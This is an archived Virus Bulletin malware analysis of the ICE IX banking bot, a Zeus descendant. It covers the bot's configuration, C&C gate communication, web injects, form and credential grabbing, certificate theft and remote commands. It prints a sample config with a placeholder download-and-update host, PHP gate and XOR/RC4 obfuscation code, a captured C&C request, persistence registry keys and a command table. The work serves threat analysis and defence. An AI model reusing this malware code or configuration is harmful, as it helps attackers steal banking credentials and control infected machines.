{
	"id": "cd555143-a910-4b18-9350-3c3ea9f4397d",
	"created_at": "2026-04-06T00:13:03.988893Z",
	"updated_at": "2026-04-10T03:21:28.006538Z",
	"deleted_at": null,
	"sha1_hash": "22cf1586ec8ba727a3650e5e00103711bfa48afb",
	"title": "Inside the ICE IX bot, descendent of Zeus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 560779,
	"plain_text": "Inside the ICE IX bot, descendent of Zeus\r\nBy Aditya K. SoodMichigan State University, USA\r\nArchived: 2026-04-05 14:01:18 UTC\r\n2012-08-01\r\nRichard J. Enbody\r\nMichigan Stat University, USA\r\nRohit Bansal\r\nSecNiche Security Labs, USA\r\nEditor: Helen Martin\r\nAbstract\r\nAditya Sood and colleagues present an analysis of ICE IX bot, a descendent of the Zeus bot which demonstrates\r\nhow one bot can give rise to another.\r\nCopyright © 2012 Virus Bulletin\r\nThe ICE IX bot is considered to be a descendent of the Zeus botnet because it uses some of Zeus’s source code.\r\nICE IX communicates using the HTTP protocol, so it can be considered to be a third generation botnet. While it\r\nhas been used for a variety of purposes, a major threat of ICE IX comes from its manipulation of banking\r\noperations on infected machines. As with any bot, infection results in establishing a master-slave relationship\r\nbetween the botmaster and the compromised machine.\r\nSome researchers do not consider ICE IX to be as effective as Zeus [1] – for example because of its code reuse,\r\nhaving fewer features, and so on. ICE IX implements the web injects feature that was the core feature of the Zeus\r\nbotnet. It also uses some of the interesting code patterns from Zeus’s source. For example, the web injects module\r\nhas been optimized to work effectively with different browsers. ICE IX implements enhanced driver-mode code to\r\nbypass firewalls and protection software without raising any alarms. However, ICE IX is still an interesting target\r\nfor analysis and in this paper we present an analysis of the ICE IX bot version \u003c =1.2.0 to cover its different\r\nfunctionalities.\r\nThe roots of the name ICE IX may lie in literature: William Gibson’s 1984 novel Neuromancer coined the term\r\n‘ICE’, which stood for ‘Intrusion Countermeasure Electronics’, and the central theme of Kurt Vonnegut’s 1963\r\nnovel Cat’s Cradle was the ice-nine crystal – which spread to crystallize the water of the world. In the rest of the\r\npaper, we will shorten ICE IX to ICE.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 1 of 16\n\nICE bot building and configuration\r\nTo configure the ICE bot, several parameters are defined in the file settings.txt. This file contains several sections,\r\neach defining various functions of the ICE bot. It is useful to begin with the configuration settings because these\r\nexpose the bot’s capabilities. The different configuration parameters of the ICE bot are as follows:\r\nautoupdate_path: this parameter defines the path of the executable file (hosted in a remote location) that the\r\nICE bot downloads to update itself when configuration parameters change.\r\nreceiving_script_path: this parameter defines a path to the gateway that the ICE bot uses to connect back to\r\nits Command and Control (C\u0026C) server. ICE uses this connection to pass on information extracted from\r\nthe compromised machines.\r\ninjects_file: this parameter defines a path to the web injects file which contains rule sets for altering\r\nincoming HTTP responses to inject illegitimate content into web pages.\r\nDataGrabFilters: this parameter defines filters for grabbing content in web pages.\r\nURLRedirects: this parameter defines redirection rules for particular domains, allowing the browser to\r\nserve a fake web page when a legitimate domain name is entered in the address bar.\r\nMirrorServers: this parameter defines a path for backup servers that store the different configuration files\r\nfor the ICE bot. If a primary server becomes unavailable, this option acts as a secure failover so the bot can\r\ndownload other versions of configuration files from mirror (backup) servers.\r\nURIMasks: this parameter specifies various masks (a.k.a. rules) for customizing operations on different\r\nwebsites. The ‘N’ flag specifies that the ICE bot should not write any data in its reports. The ‘S’ flag\r\ninstructs the bot to take a screenshot of the web page specified in the URI. The ‘C’ flag instructs the bot to\r\nmanage the cookie handling support for the masked URI so it can preserve and delete the cookies\r\nassociated with the domain. The ‘B’ flag blocks access to the website specified in the masked URI.\r\nA simple example of an ICE bot configuration file is presented in Listing 1 below:\r\n{“Settings”\r\n autoupdate_path “http://hacked_domain/bot.exe\u0026rdquo;\r\n receiving_script_path “http://hacked_domain/script.php\u0026rdquo;\r\n injects_file “web_injects.txt”\r\n {\"DataGrabFilters\"\r\n ; “Http://mail.rambler.ru/ *” “passw; login”\r\n }\r\n {“URLRedirects”\r\n “Http://www.rambler.ru\u0026rdquo; “http://www.yandex.ru\u0026rdquo; “GP” “” “”\r\n }\r\n \r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 2 of 16\n\n{“MirrorServers”\r\n “http://backup_domain/config_backup_v_1.bin\u0026rdquo;\r\n }\r\n URI mask\r\n {“URLMasks”e\r\n “Nhttp: / / * wellsfargo.com / *”\r\n “Nhttp: / / citibank.com / *”\r\n “S * / chase.com / *”\r\n “S * / bankofamerica.com / *”\r\n } }\r\nListing 1: Example layout of an ICE bot configuration file.\r\nOnce the configuration parameters have been defined in the settings file, it’s time for the builder to generate a bot\r\nthat uses the following specific build parameters:\r\nConfiguration File – path to the configuration file containing settings parameters.\r\nConfiguration File Retrieval Time – specifies the time interval to be set for successful retrieval of the\r\nconfiguration file from the server.\r\nStatistics Retrieval Time – specifies the time interval for sending information back to the C\u0026C server.\r\nEncryption Key – the RC4 encryption key used for encrypting the configuration file.\r\nCertification Deletion – deletes certificates from the infected machine after installation of the bot.\r\nDisable TCP Operations – stops various TCP servers including SOCKS, VNC, etc. that are used as\r\nbackconnect servers.\r\nOther configuration parameters exist, but the primary ones are those discussed above. (More detail is provided in\r\nthe appendix.)\r\nUnderstanding the gate communication\r\nThe gate acts as an interface between the C\u0026C server and the infected machine. The bot connects to the gate,\r\nwhich in turn connects to the C\u0026C server. Thus, the bot does not send information directly to the C\u0026C server, but\r\ninstead routes it through the intermediate gate. This gate organization provides a more modular architecture and it\r\nis possible to host the C\u0026C server on a different domain from the gate. However, the gate and C\u0026C server are\r\nusually hosted on the same domain. From a design perspective, gate.php depends on the config.php and\r\nglobal.php files.\r\nListing 2 shows how the C\u0026C server sends the configuration file (settings.bin) in response to a request from the\r\nbot sent through the gate. The bot sends a unique identifier and a computed hash from the infected machine in the\r\nHTTP POST parameters. Once the gate receives the information, it executes the custom code in the config.php\r\nfile. The configuration module then verifies the hash by recomputing it on the server side. This check validates the\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 3 of 16\n\nsuccessful installation and identity of the bot. The configuration module executes an RC4 encryption routine and\r\nimplements MD5 on the string returned by the RC4 encryption routine. The identifier ($id) is passed as a\r\nparameter to the RC4 encryption with the encryption key (rc4Init ($plainkey)) that was established during the\r\ninstallation of the bot. Once the hash is computed, it is verified against the hash transmitted by the bot. If the\r\nhashes match, the C\u0026C server serves the settings.bin file over HTTP as an attachment. The file encoding is always\r\ndefined as binary and is served as plain text content over HTTP. In this way, the configuration file is sent to the bot\r\nin the infected machine.\r\n\u003c?php\r\n$plainkey=’[Encryption key to be used]’;\r\n$config_file=’settings.bin’;\r\n$id=$_POST[‘bn1’];\r\n$hash=$_POST[‘sk1’];\r\n$originalId=$id;\r\nfunction rc4Init($key){-- Redacted --}\r\nfunction rc4(\u0026$data, $key) {-- Redacted --}\r\nrc4($id,rc4Init($plainkey));\r\n$hashtocompare=strtoupper(md5($id));\r\n$data=”originalId=$originalId hash=$hash hashtocompare=$hashtocompare\\n”;\r\nif ($hashtocompare==$hash)\r\n {\r\n header(‘Content-Type: text/plain’);\r\n header(‘Content-Disposition: attachment; filename=’ . $config_file);\r\n header(‘Content-Length: ‘ . filesize($config_file));\r\n header(‘Content-Transfer-Encoding: binary’);\r\n readfile($config_file);\r\n }\r\nelse\r\n {\r\n header($_SERVER[‘SERVER_PROTOCOL’].” 404 Not Found”);\r\n }\r\n?\u003e\r\nListing 2: ICE bot configuration module.\r\nOur disassembly of the ICE bot binary yielded results similar to those shown in Listing 2. Figure 1 shows how the\r\nICE bot uses variables ‘bn1’ and ‘sk1’ to extract information from the infected machine. The ‘bn1’ variable holds\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 4 of 16\n\nthe unique value of an identifier, while the ‘sk1’ variable holds the hash value.\r\nFigure 1. Parameters extracting ID and hash information.\r\nFigure 2 shows how the ICE bot generates the hash. It implements the CryptHashData and CryptCreateHash\r\nfunctions to handle hash operations. The bot keeps sending HTTP POST requests back to the C\u0026C server to notify\r\nit of any updates in the system and to send extracted information. The HTTP POST request sent back to the gate is\r\npresented in Listing 3.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 5 of 16\n\nFigure 2. Hash generation process.\r\n--- Redacted Content ----\r\nPOST /private/adm/gate.php HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR\r\n2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\r\nHost: 4umf.com\r\nConnection: Keep-Alive\r\n.......Nl.\u0026]s.T.(.9.C..R.cF^Zrf.=A....6[..+.aq..f....;^.a.\\.w..O?...KFa,X..i....j-\r\n.k..\u0026..f.y@.^N.....43.h..R.0r.g......w.m8..._............h...\\@..C.n....3...W....\r\n3..,...0..k..sxp..p...8..|..[ ...AD.\u003c.._.k..”!....\\..B..;.)..~MZ.;U..]B.R..`..S....\r\nz...a..y..`........N.\u003eE...bD.F....o8d...|...dS..l.l.j....r..H...n.O....`....P.....\r\nw.y..%..Ikj...{........K....6.~...._..^E...UP9..|SN.#.C+...]..U...?..g............\r\n.....ZM.Q0.Z.....!W....Q.s...g.............:z.8..q’.q...3......L..M.....0......5’m.\r\n......2\u003e.......].c....i..R.S.v..........w..k.\\..jU....$....SIV9EWl6.L.`N9*....)...\r\n...?r{.M.kt.IZ.f...6H.......\\.4I.....=:l.o..QQ.......yV...\r\nHTTP/1.1 200 OK\r\nDate: Mon, 11 Jun 2012 03:50:51 GMT\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 6 of 16\n\nServer: Apache/2.2.14\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n{.”..a1]....S.=.W..t.s.........^@...........RW8V..q.X..w.W...’).\r\n \r\nListing 3: POST request in action.\r\nAnother interesting fact is that the bot generates fake HTTP traffic to google.com/webhp. Whenever the bot sends\r\ninformation back to the gate using HTTP POST requests, it also sends HTTP GET requests to google.com. The\r\nresult is fake traffic so that the HTTP requests look legitimate. Figure 3 shows how the ICE bot generates traffic.\r\nFigure 3. ICE bot traffic\r\n--- Redacted Content ---\r\nif($replyCount \u003e 0)\r\n{\r\n $replyData = pack(‘LLLLLLLL’, mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE +\r\nstrlen($replyData), 0, $replyCount).md5($replyData, true).$replyData;\r\n visualEncrypt($replyData);\r\n rc4($replyData, $config[‘botnet_cryptkey_bin’]);\r\n echo $replyData;\r\n die();\r\n }\r\n}\r\nfunction sendEmptyReply()\r\n{\r\n $replyData = pack(‘LLLLLLLL’, mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE +\r\nITEM_HEADER_SIZE, 0, 1).”\\x4A\\xE7\\x13\\x36\\xE4\\x4B\\xF9\\xBF\\x79\\xD2\\x75\\x2E\\x23\\x48\\x18\\xA5\\0\\0\\0\\0\\0\\\r\n0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0”;\r\n visualEncrypt($replyData);\r\n rc4($replyData, $GLOBALS[‘config’][‘botnet_cryptkey_bin’]);\r\n echo $replyData;\r\n die();\r\n}\r\nfunction visualEncrypt(\u0026$data)\r\n{\r\n $len = strlen($data);\r\n for($i = 1; $i \u003c $len; $i++)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 7 of 16\n\n}\nfunction visualDecrypt(\u0026$data)\n{\n $len = strlen($data);\n if($len \u003e 0)for($i = $len - 1; $i \u003e 0; $i--)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));\n}\nListing 4: Data obfuscation.\nListing 4 shows some of the obfuscation routines implemented in the ICE bot. When the bot sends information to\nthe gate, the C\u0026C can either send an empty reply or one containing some data, depending on the requirements.\nWhen the C\u0026C has to send an empty reply, it simply executes sendEmptyReply. To send a reply containing\ncommands and data, the C\u0026C server queries its database and then replies. The C\u0026C server implements its\nvisualEncrypt function to obfuscate the data, followed by an RC4 encryption routine that uses a predefined crypto\nkey to encrypt the full stream and then sends it back to the bot. On receiving the stream of data, the bot\nimplements the decryption routine to extract the command sent by the C\u0026C server. Listing 5 shows an example of\nthe data transmitted over the wire during communication between the bot and the C\u0026C server.\n\\240\\321\\373c\\333\\266\\262\\3433l\\201\\332\\314\\022\\223D\\022X\\237\\3277\\320\\272$\\241\\0250(!\\t\\035\\375\\343L\n021F.Qa\\031\\001’’@\\361\\364\\233\\365J\\245\\322t\\3730U\\324}\\364@\\262|\\204\\212D\n\\360P\\264v\\231\\303QD\\324\\206\\210\\300wV\\n\n\\211\\275\\311\\301\\3308\\337\\265+\\256\\032?’.\\006\\022\\362\\354C\\036I!^n\\026\\016((O\\376\\373\\224\\372E\\252\\33\n{\\364?Z\\333r\\373O\\275s\\213\\205K\n\nListing 5: Obfuscated data – ICE bot communication.\nWe have now covered the communication model of ICE bot.\nICE bot web injects\nICE bot’s web injects are similar to those used by Zeus and SpyEye, except that they have been redesigned and\noptimized for better performance. They provide improved functionality to inject data with more successful results.\nWeb injection is a technique in which a bot injects malicious content into the incoming HTTP responses. The\ninjected content tricks the user into entering sensitive information. Details of web injects can be found in [2], [3].\nListing 6 shows the content from a webinjects.txt file used by an ICE bot to trigger injections.\nset_url https://online.wellsfargo.com/das/cgi-bin/session.cgi* GL\ndata_before\n\ndata_end\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\nPage 8 of 16\n\ndata_inject\ndata_end\ndata_after\n\nFigure 4. ICE bot form grabbing in action.\r\nBecause of where it sits, form grabbing works over both HTTP and HTTPS protocols. In addition to stealing data\r\nfrom forms, a similar tactic can be used to grab .sol files (Flash settings) and cookies. The ICE bot also has special\r\nbuilt-in grabbers for particular purposes. For example, it has grabbers to extract the credentials from FTP clients\r\nsuch as FlashFXP, Total Commander, WsFTP, FileZilla, FAR Manager, WinSCP, FTP Commander, CoreFTP,\r\nSmartFTP, and from mail clients such as Windows Mail, Live Mail and Outlook.\r\nSelf-destructive code\r\nICE bot implements melting, in which it deletes the dropper program after successful installation. The dropper is\r\nthe malicious binary that was served during a drive-by download attack. Once it has installed the bot, the dropper\r\nis no longer needed so it deletes itself. The dropper can also be thought of as a loader because it loads the ICE bot\r\ninto the system and then removes its initial footprint.\r\nFigure 5 shows a code snippet extracted during analysis of ICE bot. In this snippet, the program has built-in batch\r\ninstructions that are executed after dropping the bot. One can see that the ‘del’ command is used with option ‘/F’\r\nthat forcefully deletes the files in the directory.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 10 of 16\n\nFigure 5. Self-destructive code.\r\nUser-Agent detection\r\nFigure 6 shows that the ICE bot uses its ObtainUserAgentString function to retrieve the default User-Agent string\r\nused by the browser in the infected system. Using this information, the details of the infected machine are sent\r\nback to the C\u0026C server, including the type of operating system, browser and other environment-specific\r\ninformation. This communication allows the botmaster to understand the state of infected machines and to fine-tune the infection.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 11 of 16\n\nFigure 6. Extracting User-Agent information.\r\nCertificate deletion process\r\nICE bot uses a built-in Windows API function to delete certificates from the certificate store. The motive behind\r\ndeleting the certificates is to remove the encryption implemented on the end points. Primarily, the bot is interested\r\nin deleting certificates that are associated with private keys belonging to the user.\r\nThis allows the bot to remove the identity and authentication information present in certificates. After this, when a\r\nuser imports a new certificate, these are captured and stored on the C\u0026C server for later use. The process is\r\nexecuted as follows:\r\nICE bot opens the certificate store using the CertOpenSystemStore API. It typically has two parameters.\r\nThe important one is szSubsystemProtocol, which defines the name of the store. There are four different\r\nattributes associated with the szSubsystemProtocol: CA refers to the certification authority, ROOT refers to\r\nthe root certificates, SPC refers to the Software Publishing Certificate and MY points to the certificate store\r\nthat has certificates associated with private keys. ICE bot uses MY szSubsystemProtocol to query the\r\ncertificate store.\r\nUpon successful opening of the store, ICE bot enumerates the list of certificates using\r\nCertEnumCertificatesInStore in a loop. Using CertDuplicateCertificateContext, it duplicates the certificate\r\ncontext which contains a handle to the certificate store. This is done to retrieve a handle for each unique\r\ncertificate individually, by incrementing and decrementing the reference count.\r\nFinally, the ICE bot deletes the certificate from the store using CertDeleteCertificateFromStore, and then\r\ncloses the store using CertCloseStore.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 12 of 16\n\nIt also implements the PFXExportCertStoreEx function, which exports certificates and associated public keys\r\nfrom the certificate store. Figure 7 shows the certificate deletion process in action.\r\nFigure 7. Deleting certificates from an infected system.\r\nRegistry check and command execution\r\nWhen an ICE bot is installed, it modifies the registry settings by creating new registry keys. Listing 7 shows the\r\nbehaviour of ICE bot pertaining to registry modifications and disk operations.\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e\r\nData: c:\\windows\\iqs.exe\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e\r\nData: c:\\windows\\iqs.exe\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|{BC7B83DC-3CBF-5AA3-5606-123385554906}\r\n(Trojan.ZbotR.Gen) -\u003e Data: “C:\\Documents and Settings\\Administrator\\Application Data\\Fox\\bolifa.exe”\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\Software\\Microsoft\\Windows\\\r\nCurrentVersion\\Run|Microsoft Firevall Engine (Trojan.Agent) -\u003e Data: c:\\windows\\iqs.exe\r\n \r\nListing 7: Registry keys created by ICE bot.\r\nA registry key with the name ‘Microsoft Firevall Engine’ is created, which has an entry in the system startup. It\r\nuses a similar naming convention to the Microsoft firewall in order to be less suspicious. However, the bot can\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 13 of 16\n\ngenerate random binary names and registry keys to increase the complexity. To trigger command execution, the\r\nbot executes the inbuilt Windows API to subvert the functionality of the operating system. For example: in\r\nrebooting and shutting down the system, the bot uses ExitWindowsEx and InitiateSystemShutdownExW. Figure 8\r\nshows the command execution behaviour.\r\nFigure 8. System shutdown module.\r\nBackconnect and supporting modules\r\nBackconnect is an interesting technique that is based on the concept of reverse proxying, in which the reverse\r\nproxy agent takes requests from the servers and forwards them to the machines present in the internal network.\r\nWhen the infected system is situated behind a Network Address Translation (NAT) bridge, malware authors\r\nimplement the backconnect module. The backconnect server hides the identity of the C\u0026C servers on the Internet.\r\nIt is a stealthy way of sending commands to infected machines inside the network used by C\u0026C servers. The\r\nSecure Sockets (SOCKS) protocol is designed specifically to bypass Internet filtering systems and perimeter-level\r\nsecurity. SOCKS proxies are considered as a circumvention tool to bypass firewalls and make successful\r\nconnections using raw TCP sockets. HTTP and SOCKS are used to route communication packets through\r\nfirewalls. ICE bot implements SOCKS proxy with backconnect support. In addition, it also supports the VNC\r\nremote management module. It also implements a screen-capturing module, in which the botmaster defines the\r\nrules for capturing screenshots of target websites.\r\nConclusion\r\nIn this paper, we have presented an analysis of the ICE IX bot, a descendent of the Zeus bot. It uses techniques\r\nsimilar to those of Zeus with some modifications and optimizations. The origin of ICE bot demonstrates how one\r\nbot can give rise to another, and how botnets – which are still a threat – are evolving to be more robust and\r\neffective.\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 14 of 16\n\nBibliography\r\nAppendix: ICE IX bot commands\r\nCommands Explanation\r\nbot_uninstall Uninstalling bot from the infected machine\r\nbot_update Scanning bot for checking the applied configuration and required updates\r\nbot_update_exe Updating bot remotely with new configuration\r\nbot_bc_add Creating backconnect connection with the bot\r\nbot_bc_delete Removing backconnect connection with the bot\r\nbot_httpinject_disable Disabling web injects functionality of the bot\r\nbot_httpinject_enable Enabling web injects functionality of the bot\r\nTable 1. Bot controlling commands\r\nCommands Explanation\r\nuser_destroy Destroy the infected machine\r\nuser_logoff Killing active user session on the infected machine\r\nuser_execute Download and execute remote executable on the infected machine\r\nuser_cookies_get Extract the cookies from stored and active browser session\r\nuser_cookies_remove Delete the cookies\r\nuser_certs_get Extract specific certificate from the infected machine\r\nuser_certs_remove Delete certificates from the infected machine\r\nuser_url_block Block access to a specific domain on the Internet\r\nuser_url_unblock Unblock access to a restricted domain\r\nuser_homepage_set Set the default home page of the browser\r\nuser_flashplayer_get Extract settings of Sol files from the infected machine\r\nuser_flashplayer_remove Delete Sol files from the infected machine\r\nos_shutdown Shut down infected machine\r\nos_reboot Reboot infected machine\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 15 of 16\n\nTable 2. System manipulation commands.\r\nSource: https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nhttps://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus\r\nPage 16 of 16\n\nListing 2: Our disassembly ICE bot configuration of the ICE bot module. binary yielded results similar to those shown in Listing 2. Figure 1 shows how the\nICE bot uses variables ‘bn1’ and ‘sk1’ to extract information from the infected machine. The ‘bn1’ variable holds\n   Page 4 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus"
	],
	"report_names": [
		"inside-ice-ix-bot-descendent-zeus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434383,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.pdf",
		"text": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.txt",
		"img": "https://archive.orkl.eu/22cf1586ec8ba727a3650e5e00103711bfa48afb.jpg"
	}
}